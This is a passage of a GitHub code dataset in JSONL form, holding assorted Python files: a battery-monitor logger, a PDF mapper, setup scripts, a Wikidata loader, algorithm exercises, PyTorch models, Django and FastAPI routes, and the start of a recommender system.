print('PV SOC = ' + str(SOC) + '%')\n\n\t# one of cell voltage has to be cast to a float\n\t\tCell1 = float(dcmp(8, 2, var_sbms)) / 1000\n\t# print('Cell1 = ' + str(Cell1) + '\\n')\n\n\t\tCell2 = float(dcmp(10, 2, var_sbms)) / 1000\n\t# print('Cell2 = ' + str(Cell2) + '\\n')\n\n\t\tCell3 = float(dcmp(12, 2, var_sbms)) / 1000\n\t# print('Cell3 = ' + str(Cell3) + '\\n')\n\n\t\tCell4 = float(dcmp(14, 2, var_sbms)) / 1000\n\t# print('Cell4 = ' + str(Cell4) + '\\n')\n\n\t\tCell5 = float(dcmp(16, 2, var_sbms)) / 1000\n\t# print('Cell5 = ' + str(Cell5) + '\\n')\n\n\t\tCell6 = float(dcmp(18, 2, var_sbms)) / 1000\n\t# print('Cell6 = ' + str(Cell6) + '\\n')\n\n\t\tCell7 = float(dcmp(20, 2, var_sbms)) / 1000\n\t# print('Cell7 = ' + str(Cell7) + '\\n')\n\n\t\tCell8 = float(dcmp(22, 2, var_sbms)) / 1000\n\t# print('Cell8 = ' + str(Cell8) + '\\n')\n\n\t# Converted based on documentation: 0 to 1449 = -45C to 99.9C\n\t# Converting to fahrenheit\n\t\tInternal_temp = float((dcmp(24, 2, var_sbms)-450)/10*9/5+32)\n\t\tInternal_temp = round(Internal_temp,3)\n\t# print('Internal temp = ' + str(Internal_temp) + '\\n')\n\n\t# Converted based on documentation: 0 to 1449 = -45C to 99.9C\n\t# Converting to fahrenheit\n\t\tExternal_temp = float((dcmp(26, 2, var_sbms)-450)/10*9/5+32)\n\t\tExternal_temp = round(External_temp,3)\n\t# print('External temp = ' + str(External_temp) + '\\n') \n\n\t# Bat + and - sign at [28] is not compressed\n\t\tsign = var_sbms[28]\n\n\t\tBatt_current = round(float(dcmp(29, 3, var_sbms))/1000,3)\n\t\tif(sign == '-'):\n\t\t\tBatt_current = (-1)*Batt_current\n\t#\tprint('Battery current = ' + str(Batt_current) + '\\n')\n\n\t\tPV1 = float(dcmp(32, 3, var_sbms))\n\t# print('PV1 current = ' + str(PV1) + '\\n')\n\n\t\tPV2 = float(dcmp(35, 3, var_sbms))\n\t# print('PV2 current = ' + str(PV2) + '\\n')\n\n\t\tExternal_load = (dcmp(38, 3, var_sbms))\n\t#\tprint('External load current = ' + str(External_load) + '\\n')\n\n\t\tADC2 = float(dcmp(41, 3, var_sbms))\n\t#\tprint('ADC2 = ' + str(ADC2) + '\\n')\n\n\t\tADC3 = float(dcmp(44, 3, var_sbms))\n\t#\tprint('ADC3 = ' + str(ADC3) + '\\n')\n\n\t\tADC4 = float(dcmp(47, 3, var_sbms))\n\t#\tprint('ADC4 = ' + str(ADC4) + '\\n')\n\n\t\theat1 = float(dcmp(50, 3, var_sbms))\n\t# print('heat1 = ' + 
str(heat1) + '\\n')\n\n\t\theat2 = float(dcmp(53, 3, var_sbms))\n\t# print('heat2 = ' + str(heat2) + '\\n')\n\n\t\tERR = dcmp(56, 3, var_sbms)\n\t# print('ERR_code = '+ str(ERR) + 'change to binary\\n')\n\n\t# calculations\n\t\tBattery_voltage = (Cell1 + Cell2 + Cell3 + Cell4 + Cell5 + Cell6 + Cell7 + Cell8)\n\t#\tBattery_voltage = round(Battery_voltage, 3)\n\t# print('Battery voltage = ' + str(Battery_voltage) + 'V')\n\n\t# External load\n\t\tExternal_load = float(External_load / 1000)\n\t\tExternal_load = round(External_load, 3)\n\t# print('External Load current = ' + str(External_load) + 'A')\n\n\t# Total PV current\n\t\tPV_total_current = (PV1 + PV2) / 1000\n\t\tPV_total_current = round(PV_total_current, 3)\n\n\t# print('Total PV current = ' + str(PV_total_current) + 'A')\n\n\t#Converting error to binary\n\t\tError_Binary = '{0:08b}'.format(ERR)\n\n\t#Capturing SBMS0 flag values to array \n\t\tflags = []\n\t\tif(ERR & 16384):\n\t\t\tflags.append('DFET')\n\t\tif(ERR & 8192):\n\t\t\tflags.append('EOC')\n\t\tif(ERR & 4096):\n\t\t\tflags.append('CFET')\n\t\tif(ERR & 2048):\n\t\t\tflags.append('ECCF')\n\t\tif(ERR & 1024):\n\t\t\tflags.append('LVC')\n\t\tif(ERR & 512):\n\t\t\tflags.append('OPEN')\n\t\tif(ERR & 256):\n\t\t\tflags.append('CELF')\n\t\tif(ERR & 128):\n\t\t\tflags.append('DSC')\n\t\tif(ERR & 64):\n\t\t\tflags.append('DOC')\n\t\tif(ERR & 32):\n\t\t\tflags.append('COC')\n\t\tif(ERR & 16):\n\t\t\tflags.append('IOT')\n\t\tif(ERR & 8):\n\t\t\tflags.append('UVLK')\n\t\tif(ERR & 4):\n\t\t\tflags.append('UV')\n\t\tif(ERR & 2):\n\t\t\tflags.append('OVLK')\n\t\tif(ERR & 1):\n\t\t\tflags.append('OV')\n\n\t# Joining flags to a single string for simple output\n\t\tseparator = \", \"\n\t\tflags = separator.join(flags)\n\n\t# Creating Cell Delta values\n\t\tvoltages = [Cell1,Cell2,Cell3,Cell4,Cell5,Cell6,Cell7,Cell8]\n\t\tmaxv = max(voltages)\n\t\tminv = min(i for i in voltages if i > 0)\n\t\tdelta = maxv-minv\n\t# print('Cell Voltage Delta = ' + str(delta) + 'V' + '\\n')\n\n\t# Create DB payload\n\t\tjson_body = [\n\t\t{\n\t\t\t\"measurement\": \"SBMS_Metrics\",\n\t\t\t\"tags\": {\n\t\t\t\t\"Name\": \"SBMS0a\"\n\t\t\t},\n\t\t\t\"fields\": {\n\t\t\t\t\"External Temperature\": External_temp,\n\t\t\t\t\"Internal Temperature\": Internal_temp,\n\t\t\t\t\"Monitor Flags\": flags,\n\t\t\t\t\"Battery Voltage\": Battery_voltage,\n\t\t\t\t\"Battery Current\": Batt_current,\n\t\t\t\t\"PV Total Current\": PV_total_current,\n\t\t\t\t\"PV1\": PV1,\n\t\t\t\t\"PV2\": PV2,\n\t\t\t\t\"External Load\": External_load,\n\t\t\t\t\"State of Charge\": SOC,\n\t\t\t\t\"ADC2\": ADC2,\n\t\t\t\t\"ADC2\": ADC3,\n\t\t\t\t\"ADC2\": ADC4,\n\t\t\t\t\"Heat 1\": heat1,\n\t\t\t\t\"Heat 2\": heat2,\n\t\t\t\t\"Cell 1\": Cell1,\n\t\t\t\t\"Cell 2\": Cell2,\n\t\t\t\t\"Cell 3\": Cell3,\n\t\t\t\t\"Cell 4\": Cell4,\n\t\t\t\t\"Cell 5\": Cell5,\n\t\t\t\t\"Cell 6\": Cell6,\n\t\t\t\t\"Cell 7\": Cell7,\n\t\t\t\t\"Cell 8\": Cell8,\n\t\t\t\t\"Cell Delta\": delta\n\t\t\t\t}\n\t\t\t}\n\t\t]\n\t# Write to DB\n\t\tclient.write_points(json_body)\n\telse:\n\t\ttime.sleep(10)\n","repo_name":"Burtond/Electrodacus","sub_path":"sbms0-SerialToInfluxDB.py","file_name":"sbms0-SerialToInfluxDB.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"27331966224","text":"# from tika import parser\nimport PyPDF2 as p2\nimport os\npath = \"C:/Users/karin/OneDrive/Desktop/rb/pdfmap/pdf\"\nteststring = \"hi there (everyone will get better\"\npdfmap = []\nfiles = []\n# 
r=root, d=directories, f = files\nfor r, d, f in os.walk(path):\n for file in f:\n if '.pdf' in file:\n files.append(os.path.join(r, file))\n\nfor f in files:\n # print(f)\n\n#PDFpy2\n PDFfile = open(f,\"rb\")\n pdfr = p2.PdfFileReader(PDFfile)\n x = pdfr.getPage(0)\n #print(x.extractText())\n y = x.extractText()[102:138]\n if y in pdfmap:\n # pdfmap.append(y)\n print(teststring)\n else:\n # print(teststring)\n print(y)\n pdfmap.append(y)\n# print(len(pdfmap))\n# test = \"(F,K,E,I)(R,M,T,O)(P,R,N,T)(O,I,Q,K)\"\n# print(test in pdfmap)\n# print(test)","repo_name":"krxwer4/WROAllTheTime","sub_path":"Dataset/pdfmap/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9899700912","text":"# Author: Ritaank Tiwari\n\nimport argparse\nimport os.path as osp\nimport subprocess\nfrom loguru import logger\n\ndef create_parser():\n parser = argparse.ArgumentParser(description='Setup the directory structure for SOMA')\n parser.add_argument('--studies_path', type=str, help='The path to S: from your device', default='/mnt/S/')\n return parser\n\ndef copy_dirs(args):\n\n dirs = ['soma-root', 'smpl-fast-derivatives.tar.bz2', 'bpy-2.83-20200908.tar.bz2']\n\n for dir in dirs:\n path_to_dir_base = osp.join(args.studies_path, '_Repositories','soma-setup', dir)\n logger.info(f\"copying {dir} from {path_to_dir_base} to .\")\n try:\n subprocess.run(['cp', '-R', path_to_dir_base, '.'])\n except:\n logger.error(f'Could not find {dir}. Please check the path to the studies folder')\n return\n \n logger.success(f\"Successfully copied {dir} to .\")\n\ndef setup(args):\n copy_dirs(args)\n\nif __name__ == \"__main__\":\n parser = create_parser()\n args = parser.parse_args()\n setup(args)","repo_name":"ritaank/SOMA-interface","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"6047236317","text":"import json\nimport sys\nfrom Database import MyDatabase\n\nwith open('properties.json', 'r') as f:\n properties = json.load(f)\n\ndb = MyDatabase('wikidata.db', connect_each=False)\ndb.create(True, 'Entities', [('id', 'TEXT'), ('label', 'TEXT'), ('description', 'TEXT')])\ndb.create(True, 'Properties', [('property_id', 'TEXT'), ('label', 'TEXT'), ('description', 'TEXT')])\ndb.create(True, 'Relations', [('head_id', 'TEXT'), ('property', 'TEXT'), ('target', 'TEXT')])\n\nwith open('summarized.txt', 'r') as f:\n for i, line in enumerate(f):\n data = json.loads(line.strip())\n if data[0].startswith('Q'):\n db.insert('Entities', [(data[0], data[1], data[2])])\n elif data[0].startswith('P'):\n db.insert('Properties', [(data[0], data[1], data[2])])\n else:\n print(data[0])\n \n for r, val in data[4]:\n if r in properties and data[0].startswith('Q'):\n db.insert('Relations', [(data[0], r, json.dumps(val))])\n \n sys.stdout.write('finished {}/{} \\r'.format(i, 70900911))\n\ndb.commit()\ndb.close()\n","repo_name":"wenhuchen/KGPT","sub_path":"preprocess/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":142,"dataset":"github-code","pt":"3"} +{"seq_id":"30222739840","text":"#Runtime: O(n) | Space: O(1)\n#\t\t where n is the length of \"arr\" array\ndef max_subset_sum_non_adjacent(arr):\n\t#From looking at the 2nd soln (below this one), we can see that we only need to keep track of two 
values\n\t#The max at that specific index is either the sum of that current value plus the maxSum at the index two spots before or the maxSum at the previous index\n\t#Due to this, we just need to keep track of and update the prevMaxSum and prevPrevMaxSum.\n\t#Everything else remains the same so look at the 2nd soln for more details\n\tif len(arr) == 0:\n\t\treturn 0\n\n\tprevPrevMaxSum = arr[0]\n\tif len(arr) == 1:\n\t\treturn prevPrevMaxSum\n\n\tprevMaxSum = arr[1]\n\tif len(arr) == 2:\n\t\treturn prevMaxSum\n\n\tfor i in range(2, len(arr)):\n\t\tcurrMaxSum = max(prevMaxSum, arr[i]+prevPrevMaxSum)\n\t\tprevPrevMaxSum = prevMaxSum\n\t\tprevMaxSum = currMaxSum\n\n\treturn prevMaxSum\n\n\n#Runtime: O(n) | Space: O(n)\n#\t\t where n is the length of \"arr\" array\ndef max_subset_sum_non_adjacent2(arr):\n\t#Check if empty list and return 0\n\t#First initialize a list (maxArr) of same length as arr and initialize them all to 0.\n\t#Fill the first index of maxArr with first value of arr.\n\t\t#Then, check if length of arr is 1 and if it is, return that first index's value\n\t#Fill the second index of maxArr with max(arr[0], arr[1])\n\t\t#Then, check if length of arr is 2 and if it is, return the second index's value \n\t#This maxArr would indicate at each index, what the max subset sum would be if the list ended at that index\n\t\t#We go through remaining vals in arr and fill its corresponding maxArr value by using the following formula \n\t\t#maxArr[i] = max(arr[i]+maxArr[i-2], maxArr[i-1])\n\t#Return the last index's value\n\n\tif len(arr) == 0:\n\t\treturn 0\n\n\tmaxArr = [0 for x in range(len(arr))]\n\n\tmaxArr[0] = arr[0]\n\tif len(arr) == 1:\n\t\treturn maxArr[0]\n\n\tmaxArr[1] = max(arr[0], arr[1])\n\tif len(arr) == 2:\n\t\treturn maxArr[1]\n\n\tfor i in range(2, len(maxArr)):\n\t\tmaxArr[i] = max(arr[i] + maxArr[i-2], maxArr[i-1])\n\n\treturn maxArr[-1]\n\n\n\n\narr1 = [75, 105, 120, 75, 90, 135]\nprint(max_subset_sum_non_adjacent(arr1))\n#330 because of [75, 120, 135] \n\narr2 = [1, 2]\nprint(max_subset_sum_non_adjacent(arr2))\n#2 because of [2] \n\narr3 = [3, 3, 3, 4, 10, 4]\nprint(max_subset_sum_non_adjacent(arr3))\n#16 because of [3, 3, 10]","repo_name":"AlvinNgo123/leetcode_practice","sub_path":"year1/max_subset_sum_non_adjacent.py","file_name":"max_subset_sum_non_adjacent.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13619244773","text":"#!/usr/bin/python\n\nfrom typing import List\n\n\"\"\"\nGiven an array of integers, return indices of the two numbers such that \nthey add up to a specific target.\n\nYou may assume that each input would have exactly one solution, and you \nmay not use the same element twice.\n\nExample:\n\nGiven nums = [2, 7, 11, 15], target = 9,\n\nBecause nums[0] + nums[1] = 2 + 7 = 9,\nreturn [0, 1].\n\"\"\"\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n \"\"\"\n O(n) solution\n \"\"\"\n map_ = {}\n idx = 0\n \n for v in nums:\n if target - v in map_.keys():\n return [map_[target -v], idx]\n map_[v] = idx\n idx += 1\n return [-1, -1]\n # End twoSum\n","repo_name":"stefan-lin/leetcode","sub_path":"1_twosum/py_solution/twosum.py","file_name":"twosum.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1151967","text":"import torch\nfrom torch import nn as nn\nimport torch.nn.functional as F\n\n\nclass 
Alert(nn.Module):\n def __init__(self, width=48, height=48, initialization=None, num_channels=384):\n super().__init__()\n if initialization == 'normal':\n initialize_weights = nn.init.xavier_normal_\n elif initialization == 'uniform':\n initialize_weights = nn.init.xavier_uniform_\n elif initialization is None:\n pass\n else:\n raise Exception('There is no such initialization')\n\n self.mean_pool = torch.nn.AvgPool2d(kernel_size=(width, height))\n self.max_pool = torch.nn.MaxPool2d(kernel_size=(width, height))\n self.fc1 = nn.Linear(in_features=num_channels*3, out_features=num_channels)\n\n self.bn1 = nn.BatchNorm1d(num_channels)\n self.fc2 = nn.Linear(in_features=num_channels, out_features=num_channels//4)\n\n self.bn2 = nn.BatchNorm1d(num_channels//4)\n self.fc3 = nn.Linear(in_features=num_channels//4, out_features=12)\n\n self.bn3 = nn.BatchNorm1d(12)\n self.fc4 = nn.Linear(in_features=12, out_features=1)\n\n self.bn4 = nn.BatchNorm1d(1)\n self.fc5 = nn.Linear(in_features=1, out_features=1)\n\n if initialization is not None:\n initialize_weights(self.fc1.weight)\n initialize_weights(self.fc2.weight)\n initialize_weights(self.fc3.weight)\n initialize_weights(self.fc4.weight)\n initialize_weights(self.fc5.weight)\n\n def statistical_pooling(self, x):\n std = torch.std(x,dim=(2,3)) # (B*C*H*W) -> (B*C)\n return std\n\n def mean_max_std(self, x):\n mean = self.mean_pool(x) # -> (B*C*1*1)\n mean = mean.squeeze() # -> (B*C)\n maximum = self.max_pool(x)\n maximum = maximum.squeeze()\n std = self.statistical_pooling(x)\n return torch.cat((mean, maximum, std), dim=1) #-> (B*(3*C))\n\n def forward(self, x):\n ###\n # x1 is used only for testing:\n x1 = self.mean_max_std(x)\n ###\n x = self.mean_max_std(x)\n ###\n # add extra channels for testing\n for i in range(127):\n x = torch.cat((x,x1), dim=1)\n ###\n x = F.relu(self.fc1(x))\n x = self.bn1(x)\n x = F.relu(self.fc2(x))\n x = self.bn2(x)\n x = F.relu(self.fc3(x))\n x = self.bn3(x)\n x = F.relu(self.fc4(x))\n x = self.bn4(x)\n x = torch.sigmoid(self.fc5(x))\n return x\n\n","repo_name":"victoria-lokteva/Performance-Monitoring-of-Object-Detection","sub_path":"alert.py","file_name":"alert.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"29039664233","text":"import os\nfrom os.path import abspath, dirname, join\n\n# This is simply a default location we've decided that some configuration\n# settings will use for their path.\n#\n# Making it configurable doesn't make a lot of sense because this is only where\n# default settings put files, such as static assets, the whoosh index, ect.\n# All of which can be configured in the yaml config file anyways.\nDEFAULT_INSTALL_PATH = '/opt/ganeti_webmgr'\n\n# Config location variables\n\n# default config directory is DEFAULT_INSTALL_PATH/config\nDEFAULT_CONFIG_DIR = join(DEFAULT_INSTALL_PATH, 'config')\n# try getting config directory from environment,\n# defaulting to DEFAULT_CONFIG_DIR\nCONFIG_DIR = os.environ.get('GWM_CONFIG_DIR', DEFAULT_CONFIG_DIR)\n# our config file is always named config.yml\nCONFIG_PATH = join(CONFIG_DIR, 'config.yml')\n\n\n# Path Helpers\ndef here(*x):\n \"\"\"\n This is a wrapper around join. 
It will return a path relative to the\n current file.\n \"\"\"\n return join(abspath(dirname(__file__)), *x)\n\n# This is the directory containing our python package\n# This will be site-packages or the root of the git checkout if not installed\n# as a python package\nPROJECT_ROOT = here(\"..\", \"..\", \"..\")\n\n\ndef root(*x):\n \"\"\"\n This is a wrapper around join. It will return a path relative to\n PROJECT_ROOT.\n \"\"\"\n return join(abspath(PROJECT_ROOT), *x)\n\napp_root = lambda *x: root('ganeti_webmgr', *x)\n\n# -- Project structure variables ---------------------------------------------\nSITE_NAME = 'Ganeti Web Manager'\n\n\ndef generate_secret(secret_size=32):\n \"Generates a secret key of the given size\"\n import random\n import string\n valid_chars = string.digits + string.letters\n return ''.join(\n random.SystemRandom().choice(valid_chars)\n for i in xrange(secret_size)\n )\n\n\ndef ugettext(s):\n \"\"\"Horrible Django hack for convincing Django that we are i18n'd.\"\"\"\n return s\n","repo_name":"osuosl/ganeti_webmgr","sub_path":"ganeti_webmgr/ganeti_web/settings/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"3"} +{"seq_id":"74553760082","text":"from fastapi import APIRouter, status\n\nfrom lucy.api.logging_api import ApiLogger\n\nfrom lucy.model.create_bot import CreateDcaBot\nfrom lucy.model.bot import DcaBot\nfrom lucy.infrastructure.repos.bot_repository import BotRepository\n\nrouter = APIRouter()\nlogger = ApiLogger.get_logger(\"bot_routes\")\n\n\n@router.get(\"/bots\")\ndef all_bots():\n logger.info(\"Fetching all bots\")\n bots = BotRepository().fetch_bots()\n return {\"data\": bots}\n\n\n@router.get(\"/bots/{bot_id}\")\ndef bot(bot_id: str):\n return {\"data\": BotRepository().fetch(bot_id)}\n\n\n@router.get(\"/bots/{bot_id}/summary\")\ndef summary(bot_id: str):\n bot = BotRepository().fetch(bot_id)\n positionsCnt = len(bot.positions)\n open_positions = bot.num_open_positions()\n\n resp = {\n \"id\": bot.id,\n \"name\": bot.name,\n \"description\": bot.description,\n \"capital\": bot.capital,\n \"entry_size\": bot.entry_size,\n \"so_size\": bot.so_size,\n \"max_safety_orders\": bot.max_safety_orders,\n \"allow_shorts\": bot.allow_shorts,\n \"positions\": positionsCnt,\n \"currently_open_positions\": open_positions,\n \"profit\": bot.profit()}\n\n return {\"data\": resp}\n\n\n@router.post(\"/bots\", status_code=status.HTTP_201_CREATED)\ndef create_bot(create_bot: CreateDcaBot):\n bot = DcaBot.create_new(create_bot)\n BotRepository().add(bot)\n","repo_name":"magnusblondal/lucy","sub_path":"lucy/api/app/routers/bot_routes.py","file_name":"bot_routes.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16660308515","text":"from multiprocessing import Pool, cpu_count\nimport pandas as pd\n\n\n# define traverse to unlist the lists in a list\ndef traverse(o, tree_types=(list, tuple)):\n if isinstance(o, tree_types):\n for value in o:\n for subvalue in traverse(value, tree_types):\n yield subvalue\n else:\n yield o\n\n\ndef process_Pandas_data(func, df, stemDeptKeys=None, num_processes=None, index=0):\n ''' Apply a function separately to each sub-dataframe, in parallel.'''\n \n # If num_processes is not specified, default to #machine-cores\n if num_processes==None:\n num_processes = cpu_count()\n \n # 'with' context manager takes care of 
pool.close() and pool.join() for us\n with Pool(num_processes) as pool:\n \n # calculate the chunk size as an integer\n chunk_size = int(df.shape[0]/num_processes)\n chunks = [df.iloc[df.index[i:i + chunk_size]] for i in range(0, df.shape[0], chunk_size)]\n \n # pool.map returns results as a list\n results_list = pool.map(func, chunks)\n \n # return list of processed columns, concatenated together as a new dataframe\n return pd.concat(results_list)","repo_name":"sarauny/DepartmentClassifier","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4644406619","text":"import os\nimport pickle as pkl\nimport argparse\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nparser = argparse.ArgumentParser(description='Plotting MFTMA analysis results (classification '\n 'capacity, manifold radius, manifold dimension '\n 'and center correlation) over layers')\nparser.add_argument('--num_layers', type=int, default=12, help='Number of hidden layers.')\nparser.add_argument('--mftma_analysis_dir', type=str, default='mftma-analysis',\n help='Location to output MFTMA analysis directory.')\n\nargs = parser.parse_args()\nprint(args)\n\ncapacities = []\nradii = []\ndimensions = []\ncorrelations = []\n\nfor layer in range(1,args.num_layers+1):\n temp_data = pkl.load(open(os.path.join(args.mftma_analysis_dir,str(layer)+'.pkl'), 'rb+'))\n a = 1 / np.mean(1 / temp_data['a'])\n r = np.mean(temp_data['r'])\n d = np.mean(temp_data['d'])\n r0 = temp_data['r0']\n if layer == 1:\n norm_a = a\n norm_r = r\n norm_d = d\n norm_r0 = r0\n\n a /= norm_a\n r /= norm_r\n d /= norm_d\n r0 /= norm_r0\n print(\"{} capacity: {:4f}, radius {:4f}, dimension {:4f}, correlation {:4f}\".format(\n 'LAYER_' + str(layer), a, r, d, r0))\n\n capacities.append(a)\n radii.append(r)\n dimensions.append(d)\n correlations.append(r0)\n\nfig, axes = plt.subplots(1, 4, figsize=(18, 4))\n\naxes[0].plot(capacities, linewidth=5)\naxes[1].plot(radii, linewidth=5)\naxes[2].plot(dimensions, linewidth=5)\naxes[3].plot(correlations, linewidth=5)\n\naxes[0].set_ylabel(r'$\\alpha_M$', fontsize=18)\naxes[1].set_ylabel(r'$R_M$', fontsize=18)\naxes[2].set_ylabel(r'$D_M$', fontsize=18)\naxes[3].set_ylabel(r'$\\rho_{center}$', fontsize=18)\n\nxticklabels = [i for i in range(1,args.num_layers+1)]\nfor ax in axes:\n ax.set_xticks([i for i, _ in enumerate(xticklabels)])\n ax.set_xlabel('Layer')\n ax.set_xticklabels(xticklabels, rotation=90, fontsize=16)\n ax.tick_params(axis='both', which='major', labelsize=14)\n\nplt.tight_layout()\nplt.show()","repo_name":"schung039/contextual-repr-manifolds","sub_path":"generate_plot.py","file_name":"generate_plot.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"6555861601","text":"import torch.nn as nn\r\n\r\nclass DecoderLSTM(nn.Module):\r\n def __init__(self, input_size, embedding_size, hidden_size, num_layers, p, output_size):\r\n super(DecoderLSTM, self).__init__()\r\n\r\n # Size of the one hot vectors that will be the input to the encoder\r\n #self.input_size = input_size\r\n\r\n # Output size of the word embedding NN\r\n #self.embedding_size = embedding_size\r\n\r\n # Dimension of the NN's inside the lstm cell/ (hs,cs)'s dimension.\r\n self.hidden_size = hidden_size\r\n\r\n # Number of layers in the lstm\r\n self.num_layers = num_layers\r\n\r\n # Size of the one hot vectors 
that will be the output to the encoder (English Vocab Size)\r\n self.output_size = output_size\r\n\r\n # Regularization parameter\r\n self.dropout = nn.Dropout(p)\r\n\r\n # Shape --------------------> (5376, 300) [input size, embedding dims]\r\n self.embedding = nn.Embedding(input_size, embedding_size)\r\n\r\n # Shape -----------> (300, 2, 1024) [embedding dims, hidden size, num layers]\r\n self.LSTM = nn.LSTM(embedding_size, hidden_size, num_layers, dropout = p)\r\n\r\n # Shape -----------> (1024, 4556) [embedding dims, hidden size, num layers]\r\n self.fc = nn.Linear(hidden_size, output_size)\r\n\r\n # Shape of x (32) [batch_size]\r\n def forward(self, x, hidden_state, cell_state):\r\n\r\n # Shape of x (1, 32) [1, batch_size]\r\n x = x.unsqueeze(0)\r\n\r\n # Shape -----------> (1, 32, 300) [1, batch_size, embedding dims]\r\n embedding = self.dropout(self.embedding(x))\r\n\r\n # Shape --> outputs (1, 32, 1024) [1, batch_size , hidden_size]\r\n # Shape --> (hs, cs) (2, 32, 1024) , (2, 32, 1024) [num_layers, batch_size size, hidden_size] (passing encoder's hs, cs - context vectors)\r\n outputs, (hidden_state, cell_state) = self.LSTM(embedding, (hidden_state, cell_state))\r\n\r\n # Shape --> predictions (1, 32, 4556) [ 1, batch_size , output_size]\r\n predictions = self.fc(outputs)\r\n\r\n # Shape --> predictions (32, 4556) [batch_size , output_size]\r\n predictions = predictions.squeeze(0)\r\n\r\n return predictions, hidden_state, cell_state\r\n\r\n# input_size_decoder = len(english.vocab)\r\n# decoder_embedding_size = 300\r\n# hidden_size = 1024\r\n# num_layers = 2\r\n# decoder_dropout = 0.5\r\n# output_size = len(english.vocab)\r\n#\r\n# decoder_lstm = DecoderLSTM(input_size_decoder, decoder_embedding_size,\r\n# hidden_size, num_layers, decoder_dropout, output_size).to(device)\r\n# print(decoder_lstm)","repo_name":"71115217/ComparativeQG","sub_path":"Seq2Seq/LSTMDecoder.py","file_name":"LSTMDecoder.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1228604346","text":"from django.contrib import admin\nfrom django.urls import include, path\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"sentry-debug/\", views.trigger_error, name=\"sentry\"),\n path(\"lettings/\", include(\"lettings.urls\", namespace=\"lettings\")),\n path(\"profiles/\", include(\"profiles.urls\", namespace=\"profiles\")),\n path(\"admin/\", admin.site.urls, name=\"admin\"),\n]\n","repo_name":"Solayman-B/P13_bchir_solayman","sub_path":"oc_lettings_site/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9047186109","text":"import os\nimport setuptools\n\nwith open('requirements.txt') as f:\n requirements = f.read().splitlines()\n\n_ROOT = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(_ROOT, 'README.md')) as f:\n LONG_DESCRIPTION = f.read()\n\nsetuptools.setup(\n name=\"gh-pr-commenter\",\n version=\"1.0.0\",\n description=\"Simple Script to post a github comment to a given PR based on a jinja2 template\",\n long_description=LONG_DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n author=\"enen92\",\n url=\"https://github.com/enen92/github-pr-log-commenter\",\n download_url=\"https://github.com/enen92/github-pr-log-commenter/archive/main.zip\",\n install_requires=requirements,\n python_requires=\">=3.5\",\n setup_requires=['setuptools>=38.6.0'],\n scripts=['gh-pr-commenter.py'],\n keywords='github pr-comment',\n classifiers=[\n \"Operating System :: POSIX :: Linux\",\n \"License :: OSI Approved :: GNU General Public License v2 (GPLv2)\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: MacOS\",\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Topic :: Utilities\"\n ] + [('Programming Language :: Python :: %s' % x) for x in '3 3.5 3.6 3.7'.split()]\n)","repo_name":"enen92/github-pr-log-commenter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11990065105","text":"# Method Description:\n# In order to improve the recommender system, what I choose is using model-based CF which has better performance\n# To improve the performance, I added another two attribute which are \"fan\" in user.json and \"wifi\" from business.json\n# And also, I change the parameter of default value of noise level which also improve a little of the RMSE.\n#\n#Error Distribution:\n# >=0 and <1: 101971\n# >=1 and <2: 33037\n# >=2 and <3: 6195\n# >=3 and <4: 840\n# >=4: 1\n#\n# RMSE:\n# 0.9819253043558718\n#\n# Esecution Time:\n# 47.41270709037781s\nimport os\nimport sys\nimport json\nimport time\nimport numpy as np\nimport pandas as pd\nimport xgboost as xgb\nfrom pyspark import SparkContext, SparkConf\n\n\ndef get_noise_level(attributes):\n if attributes:\n if \"NoiseLevel\" in attributes.keys():\n if attributes[\"NoiseLevel\"] == 'quiet':\n return 1\n elif attributes[\"NoiseLevel\"] == 'average':\n return 2\n elif attributes[\"NoiseLevel\"] == 'loud':\n return 3\n elif attributes[\"NoiseLevel\"] == 'very_loud':\n return 4\n return 3\n\n\ndef have_wifi(attributes):\n if attributes:\n if \"WiFi\" in attributes.keys():\n if attributes[\"WiFi\"] == 'free':\n return 2\n elif attributes[\"WiFi\"] == 'no':\n return 0\n else:\n return -1\n return -1\n\n\ndef get_data(data, user_map, business_map, default_user, 